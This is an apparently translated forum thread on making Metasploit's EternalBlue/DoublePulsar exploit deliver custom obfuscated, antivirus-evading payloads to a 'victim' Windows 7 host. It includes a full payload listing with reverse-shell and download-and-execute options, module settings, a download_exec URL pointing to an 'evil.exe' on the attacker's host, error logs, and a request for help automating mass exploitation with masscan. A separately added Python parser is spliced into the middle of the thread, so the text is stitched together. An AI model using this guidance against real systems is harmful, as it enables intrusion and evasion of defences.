Good afternoon, forum members! Help me figure this out... The situation: I open Metasploit and pick an exploit, eternalblue for example. As the PAYLOAD I can choose, say, meterpreter. The main problem is that this payload does not give me a session, and I suspect the AV is blocking it. (Under test conditions, without AV, the session comes in.) The internet is full of articles about Shellter, Veil (a new version just came out, by the way), msfvenom and so on. But everything I have read just generates and encodes the payload, and then, as everyone writes, it "is delivered to the victim machine" and launched. Now the question: how can I take an arbitrary payload (A) (for example a PowerShell one from Empire), run it through that same Veil, and attach the resulting file (B) to an exploit, that same eternalblue? The more methods you can suggest, the better. P.S. I tried choosing the payload windows/exec so as to simply pass command (A) to CMD. But with any CMD value I get an error: the parameter value is not valid. Yet if I run A manually on the victim, the session comes in. P.P.S. Most of the standard payloads in msf already contain the instructions for creating a session, whether reverse or bind. All I need is to deliver and launch my own obfuscated, encoded, etc. code.
Here we gooooo... show payloads

Code:
windows/adduser  normal  Windows Execute net user /ADD
windows/dllinject/bind_hidden_ipknock_tcp  normal  Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
windows/dllinject/bind_hidden_tcp  normal  Reflective DLL Injection, Hidden Bind TCP Stager
windows/dllinject/bind_ipv6_tcp  normal  Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
windows/dllinject/bind_ipv6_tcp_uuid  normal  Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
windows/dllinject/bind_nonx_tcp  normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp  normal  Reflective DLL Injection, Bind TCP Stager (Windows x86)
windows/dllinject/bind_tcp_rc4  normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
windows/dllinject/bind_tcp_uuid  normal  Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
windows/dllinject/find_tag  normal  Reflective DLL Injection, Find Tag Ordinal Stager
windows/dllinject/reverse_hop_http  normal  Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
windows/dllinject/reverse_http  normal  Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
windows/dllinject/reverse_http_proxy_pstore  normal  Reflective DLL Injection, Reverse HTTP Stager Proxy
windows/dllinject/reverse_ipv6_tcp  normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp  normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp  normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp  normal  Reflective DLL Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports  normal  Reflective DLL Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns  normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
windows/dllinject/reverse_tcp_rc4  normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
windows/dllinject/reverse_tcp_rc4_dns  normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
windows/dllinject/reverse_tcp_uuid  normal  Reflective DLL Injection, Reverse TCP Stager with UUID Support
windows/dllinject/reverse_winhttp  normal  Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
windows/dns_txt_query_exec  normal  DNS TXT Record Payload Download and Execution
windows/download_exec  normal  Windows Executable Download (http,https,ftp) and Execute
windows/exec  normal  Windows Execute Command
windows/format_all_drives  manual  Windows Drive Formatter
windows/loadlibrary  normal  Windows LoadLibrary Path
windows/messagebox  normal  Windows MessageBox
windows/meterpreter/bind_hidden_ipknock_tcp  normal  Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
windows/meterpreter/bind_hidden_tcp  normal  Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
windows/meterpreter/bind_ipv6_tcp  normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
windows/meterpreter/bind_ipv6_tcp_uuid  normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
windows/meterpreter/bind_nonx_tcp  normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp  normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
windows/meterpreter/bind_tcp_rc4  normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
windows/meterpreter/bind_tcp_uuid  normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
windows/meterpreter/find_tag  normal  Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
windows/meterpreter/reverse_hop_http  normal  Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
windows/meterpreter/reverse_http  normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
windows/meterpreter/reverse_http_proxy_pstore  normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
windows/meterpreter/reverse_https  normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
windows/meterpreter/reverse_https_proxy  normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
windows/meterpreter/reverse_ipv6_tcp  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_named_pipe  normal  Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
windows/meterpreter/reverse_nonx_tcp  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp  normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports  normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
windows/meterpreter/reverse_tcp_rc4  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
windows/meterpreter/reverse_tcp_rc4_dns  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
windows/meterpreter/reverse_tcp_uuid  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
windows/meterpreter/reverse_winhttp  normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
windows/meterpreter/reverse_winhttps  normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
windows/meterpreter_bind_tcp  normal  Windows Meterpreter Shell, Bind TCP Inline
windows/meterpreter_reverse_http  normal  Windows Meterpreter Shell, Reverse HTTP Inline
windows/meterpreter_reverse_https  normal  Windows Meterpreter Shell, Reverse HTTPS Inline
windows/meterpreter_reverse_ipv6_tcp  normal  Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
windows/meterpreter_reverse_tcp  normal  Windows Meterpreter Shell, Reverse TCP Inline
windows/metsvc_bind_tcp  normal  Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp  normal  Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/bind_hidden_ipknock_tcp  normal  Windows Inject DLL, Hidden Bind Ipknock TCP Stager
windows/patchupdllinject/bind_hidden_tcp  normal  Windows Inject DLL, Hidden Bind TCP Stager
windows/patchupdllinject/bind_ipv6_tcp  normal  Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
windows/patchupdllinject/bind_ipv6_tcp_uuid  normal  Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
windows/patchupdllinject/bind_nonx_tcp  normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp  normal  Windows Inject DLL, Bind TCP Stager (Windows x86)
windows/patchupdllinject/bind_tcp_rc4  normal  Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
windows/patchupdllinject/bind_tcp_uuid  normal  Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
windows/patchupdllinject/find_tag  normal  Windows Inject DLL, Find Tag Ordinal Stager
windows/patchupdllinject/reverse_ipv6_tcp  normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp  normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp  normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_tcp  normal  Windows Inject DLL, Reverse TCP Stager
windows/patchupdllinject/reverse_tcp_allports  normal  Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns  normal  Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupdllinject/reverse_tcp_rc4  normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
windows/patchupdllinject/reverse_tcp_rc4_dns  normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
windows/patchupdllinject/reverse_tcp_uuid  normal  Windows Inject DLL, Reverse TCP Stager with UUID Support
windows/patchupmeterpreter/bind_hidden_ipknock_tcp  normal  Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
windows/patchupmeterpreter/bind_hidden_tcp  normal  Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
windows/patchupmeterpreter/bind_ipv6_tcp  normal  Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
windows/patchupmeterpreter/bind_ipv6_tcp_uuid  normal  Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
windows/patchupmeterpreter/bind_nonx_tcp  normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
windows/patchupmeterpreter/bind_tcp  normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
windows/patchupmeterpreter/bind_tcp_rc4  normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
windows/patchupmeterpreter/bind_tcp_uuid  normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
windows/patchupmeterpreter/find_tag  normal  Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager
windows/patchupmeterpreter/reverse_ipv6_tcp  normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp  normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp  normal  Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp  normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports  normal  Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns  normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
windows/patchupmeterpreter/reverse_tcp_rc4  normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
windows/patchupmeterpreter/reverse_tcp_rc4_dns  normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
windows/patchupmeterpreter/reverse_tcp_uuid  normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
windows/powershell_bind_tcp  normal  Windows Interactive Powershell Session, Bind TCP
windows/powershell_reverse_tcp  normal  Windows Interactive Powershell Session, Reverse TCP
windows/shell/bind_hidden_ipknock_tcp  normal  Windows Command Shell, Hidden Bind Ipknock TCP Stager
windows/shell/bind_hidden_tcp  normal  Windows Command Shell, Hidden Bind TCP Stager
windows/shell/bind_ipv6_tcp  normal  Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
windows/shell/bind_ipv6_tcp_uuid  normal  Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
windows/shell/bind_nonx_tcp  normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp  normal  Windows Command Shell, Bind TCP Stager (Windows x86)
windows/shell/bind_tcp_rc4  normal  Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
windows/shell/bind_tcp_uuid  normal  Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
windows/shell/find_tag  normal  Windows Command Shell, Find Tag Ordinal Stager
windows/shell/reverse_ipv6_tcp  normal  Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp  normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp  normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp  normal  Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports  normal  Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns  normal  Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell/reverse_tcp_rc4  normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
windows/shell/reverse_tcp_rc4_dns  normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
windows/shell/reverse_tcp_uuid  normal  Windows Command Shell, Reverse TCP Stager with UUID Support
windows/shell_bind_tcp  normal  Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw  normal  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
windows/shell_hidden_bind_tcp  normal  Windows Command Shell, Hidden Bind TCP Inline
windows/shell_reverse_tcp  normal  Windows Command Shell, Reverse TCP Inline
windows/speak_pwned  normal  Windows Speech API - Say "You Got Pwned!"
windows/upexec/bind_hidden_ipknock_tcp  normal  Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
windows/upexec/bind_hidden_tcp  normal  Windows Upload/Execute, Hidden Bind TCP Stager
windows/upexec/bind_ipv6_tcp  normal  Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
windows/upexec/bind_ipv6_tcp_uuid  normal  Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
windows/upexec/bind_nonx_tcp  normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp  normal  Windows Upload/Execute, Bind TCP Stager (Windows x86)
windows/upexec/bind_tcp_rc4  normal  Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
windows/upexec/bind_tcp_uuid  normal  Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
windows/upexec/find_tag  normal  Windows Upload/Execute, Find Tag Ordinal Stager
windows/upexec/reverse_ipv6_tcp  normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp  normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp  normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp  normal  Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports  normal  Windows Upload/Execute, Reverse All-Port TCP Stager
windows/upexec/reverse_tcp_dns  normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
windows/upexec/reverse_tcp_rc4  normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
windows/upexec/reverse_tcp_rc4_dns  normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
windows/upexec/reverse_tcp_uuid  normal  Windows Upload/Execute, Reverse TCP Stager with UUID Support
windows/vncinject/bind_hidden_ipknock_tcp  normal  VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
windows/vncinject/bind_hidden_tcp  normal  VNC Server (Reflective Injection), Hidden Bind TCP Stager
windows/vncinject/bind_ipv6_tcp  normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
windows/vncinject/bind_ipv6_tcp_uuid  normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
windows/vncinject/bind_nonx_tcp  normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp  normal  VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
windows/vncinject/bind_tcp_rc4  normal  VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
windows/vncinject/bind_tcp_uuid  normal  VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
windows/vncinject/find_tag  normal  VNC Server (Reflective Injection), Find Tag Ordinal Stager
windows/vncinject/reverse_hop_http  normal  VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
windows/vncinject/reverse_http  normal  VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
windows/vncinject/reverse_http_proxy_pstore  normal  VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
windows/vncinject/reverse_ipv6_tcp  normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp  normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp  normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp  normal  VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports  normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
windows/vncinject/reverse_tcp_dns  normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
windows/vncinject/reverse_tcp_rc4  normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
windows/vncinject/reverse_tcp_rc4_dns  normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
windows/vncinject/reverse_tcp_uuid  normal  VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
windows/vncinject/reverse_winhttp  normal  VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
windows/x64/exec  normal  Windows x64 Execute Command
windows/x64/loadlibrary  normal  Windows x64 LoadLibrary Path
windows/x64/meterpreter/bind_ipv6_tcp  normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
windows/x64/meterpreter/bind_ipv6_tcp_uuid  normal  Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
windows/x64/meterpreter/bind_tcp  normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
windows/x64/meterpreter/bind_tcp_uuid  normal  Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
windows/x64/meterpreter/reverse_http  normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
windows/x64/meterpreter/reverse_https  normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
windows/x64/meterpreter/reverse_named_pipe  normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
windows/x64/meterpreter/reverse_tcp  normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
windows/x64/meterpreter/reverse_tcp_uuid  normal  Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
windows/x64/meterpreter/reverse_winhttp  normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
windows/x64/meterpreter/reverse_winhttps  normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
windows/x64/meterpreter_bind_tcp  normal  Windows Meterpreter Shell, Bind TCP Inline (x64)
windows/x64/meterpreter_reverse_http  normal  Windows Meterpreter Shell, Reverse HTTP Inline (x64)
windows/x64/meterpreter_reverse_https  normal  Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
windows/x64/meterpreter_reverse_ipv6_tcp  normal  Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
windows/x64/meterpreter_reverse_tcp  normal  Windows Meterpreter Shell, Reverse TCP Inline x64
windows/x64/powershell_bind_tcp  normal  Windows Interactive Powershell Session, Bind TCP
windows/x64/powershell_reverse_tcp  normal  Windows Interactive Powershell Session, Reverse TCP
windows/x64/shell/bind_ipv6_tcp  normal  Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
windows/x64/shell/bind_ipv6_tcp_uuid  normal  Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
windows/x64/shell/bind_tcp  normal  Windows x64 Command Shell, Windows x64 Bind TCP Stager
windows/x64/shell/bind_tcp_uuid  normal  Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
windows/x64/shell/reverse_tcp  normal  Windows x64 Command Shell, Windows x64 Reverse TCP Stager
windows/x64/shell/reverse_tcp_uuid  normal  Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
windows/x64/shell_bind_tcp  normal  Windows x64 Command Shell, Bind TCP Inline
windows/x64/shell_reverse_tcp  normal  Windows x64 Command Shell, Reverse TCP Inline
windows/x64/vncinject/bind_ipv6_tcp  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
windows/x64/vncinject/bind_ipv6_tcp_uuid  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
windows/x64/vncinject/bind_tcp  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
windows/x64/vncinject/bind_tcp_uuid  normal  Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
windows/x64/vncinject/reverse_http  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
windows/x64/vncinject/reverse_https  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
windows/x64/vncinject/reverse_tcp  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
windows/x64/vncinject/reverse_tcp_uuid  normal  Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
windows/x64/vncinject/reverse_winhttp  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
windows/x64/vncinject/reverse_winhttps  normal  Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)

And now to answer the questions. Let's start with reverse_tcp. You change it to dns, https and so on. If the session keeps dropping, then the good old windows/shell/reverse_tcp_dns. Or maybe it is simpler to push VNC through? windows/vncinject/reverse_http. Is the architecture right? windows/x64/exec. But if you still want your own payload, then payload/windows/download_exec. Or else... write your own. An example skeleton is here: https://github.com/rapid7/metasploi.../modules/payloads/stagers/windows/bind_tcp.rb
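A parser for the `show payloads` listing quoted above, added here as an example that is not part of the thread or of Metasploit itself. It turns the flattened rows back into records and classifies each payload by architecture, staged/inline form, direction and transport, which is the check behind the answer's "is the architecture right?" question. The sample rows are copied from the listing above (the 2017-era three-column layout); the record fields, the `Payload` class and the `select` function are my own names.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Sample rows copied from the `show payloads` listing in the thread
# (three-column layout: name, rank, description), with msfconsole's header.
SAMPLE_OUTPUT = """\
   Name                                   Rank    Description
   ----                                   ----    -----------
   windows/exec                           normal  Windows Execute Command
   windows/format_all_drives              manual  Windows Drive Formatter
   windows/meterpreter/reverse_tcp        normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_https      normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
   windows/meterpreter_reverse_tcp        normal  Windows Meterpreter Shell, Reverse TCP Inline
   windows/shell/reverse_tcp_dns          normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/x64/meterpreter/reverse_tcp    normal  Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   windows/x64/exec                       normal  Windows x64 Execute Command
"""

# A payload row: path-like name, lowercase rank, an optional Yes/No "Check"
# column that newer msfconsole builds print, then the free-text description.
# Header and separator lines contain no slash-separated lowercase name, so
# they fail to match and are skipped.
ROW_RE = re.compile(
    r"^(?P<name>[a-z0-9_]+(?:/[a-z0-9_]+)+)\s+"
    r"(?P<rank>[a-z]+)\s+"
    r"(?:(?:Yes|No)\s+)?"
    r"(?P<desc>.+?)\s*$"
)


@dataclass
class Payload:
    name: str
    rank: str
    description: str

    @property
    def arch(self) -> str:
        # Metasploit puts 64-bit Windows payloads under windows/x64/...
        return "x64" if "/x64/" in self.name else "x86"

    @property
    def staged(self) -> bool:
        # Staged payloads are written "<stage>/<stager>" (meterpreter/reverse_tcp);
        # inline ones fuse both into one segment (meterpreter_reverse_tcp).
        parts = [p for p in self.name.split("/") if p != "x64"]
        return len(parts) == 3

    @property
    def direction(self) -> Optional[str]:
        last = self.name.rsplit("/", 1)[-1]
        return next((d for d in ("reverse", "bind") if d in last), None)

    @property
    def transport(self) -> Optional[str]:
        # First match wins, so the more specific tokens are listed first.
        last = self.name.rsplit("/", 1)[-1]
        tokens = ("named_pipe", "https", "http", "tcp_dns", "tcp")
        return next((t for t in tokens if t in last), None)


def parse_show_payloads(text: str) -> List[Payload]:
    """Turn msfconsole `show payloads` output into Payload records."""
    payloads = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            payloads.append(Payload(m["name"], m["rank"], m["desc"]))
    return payloads


def select(payloads: List[Payload], *, arch: Optional[str] = None,
           direction: Optional[str] = None, transport: Optional[str] = None,
           staged: Optional[bool] = None) -> List[str]:
    """Names of the payloads matching every constraint given (None = any)."""
    def matches(p: Payload) -> bool:
        return ((arch is None or p.arch == arch)
                and (direction is None or p.direction == direction)
                and (transport is None or p.transport == transport)
                and (staged is None or p.staged == staged))
    return [p.name for p in payloads if matches(p)]


if __name__ == "__main__":
    table = parse_show_payloads(SAMPLE_OUTPUT)
    for p in table:
        print(f"{p.name:40} arch={p.arch} staged={p.staged} "
              f"direction={p.direction} transport={p.transport}")
    # The kind of question the thread is asking: which x86 reverse-HTTPS payloads exist?
    print("x86 reverse HTTPS:", select(table, arch="x86", direction="reverse", transport="https"))
```

Feed it the real listing (`msfconsole -q -x "show payloads; exit"`) and the `select` filters give a quick check that the payload family you are about to set matches the target's architecture and the transport the network actually lets through, which is what the answer above is probing for.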
Are there any people knowledgeable in this area (exploits, payloads) who could bring this software to completion, with masscan, automatic loading of exploits, and so on?
SoolFaa, thanks for the reply. I'll comment point by point...
1. I tried changing payloads; the session does not come in, even though the target host allows requests to port 80 (http), for example.
2. windows/shell/reverse_tcp_dns: I'll try it.
3. Plain windows/vncinject/reverse_http does not work. But if I first get a meterpreter session and then push vncinject through payload/inject, everything works. That option is not what I need, though.
4. The target host is x86; I keep an eye on that.
5. I had high hopes for payload/windows/download_exec. It is exactly what is needed, but the session does not come in. Yet if I open the URL manually from the target host, everything works perfectly.
So for now we can narrow the question down...
1. Why does the session not come in with payload/windows/download_exec?
2. Why does windows/exec with the parameter CND=calc.exe throw the error "could not validate CMD"?
Target: Windows 7 SP1 x86, build 7601. Attacking host: Kali Linux 2017.3. Exploit: eternalblue_doublepulsar
1) It's not the payload, it's the way it is launched. The antivirus catches any kind of injection into a process and detects reflective loading. 2) CND=calc.exe. It has to be CMD.
1) The AV is switched off. Besides, this very same exe, when launched by hand on the target, gives a session just fine. In this case the AV has nothing to do with it. 2) CND was a typo; I actually type it correctly. Here is the error that comes out: The following options failed to validate: CMD
1) Is there any Cyrillic in the path? 2) It may be complaining because of quotation marks. We're waiting for a screenshot with the parameters filled in (SET CMD calc.exe....)
1. http://192.168.137.128/evil.exe Again, the link works when opened manually on the target.
2.
Code:
Module options (exploit/windows/smb/eternalblue_doublepulsar):

   Name                Current Setting                                  Required  Description
   ----                ---------------                                  --------  -----------
   DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Doublepulsar
   ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Eternalblue
   PROCESSINJECT       spoolsv.exe                                      yes       Name of process to inject into (Change to lsass.exe for x64)
   RHOST               192.168.137.130                                  yes       The target address
   RPORT               445                                              yes       The SMB service port (TCP)
   TARGETARCHITECTURE  x86                                              yes       Target Architecture (Accepted: x86, x64)
   WINEPATH            /root/.wine/drive_c/                             yes       WINE drive_c path

Payload options (windows/exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD       calc.exe         yes       The command string to execute
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)

Result:
Code:
[*] 192.168.137.130:445 - Generating Eternalblue XML data
[*] 192.168.137.130:445 - Generating Doublepulsar XML data
[*] 192.168.137.130:445 - Generating payload DLL for Doublepulsar
[-] 192.168.137.130:445 - Exploit failed: Msf::OptionValidateError The following options failed to validate: CMD.
[*] Exploit completed, but no session was created.
Dear moderators, perhaps the topic should be renamed, since the essence of the question has changed somewhat? Now the problem is that specific payloads do not work...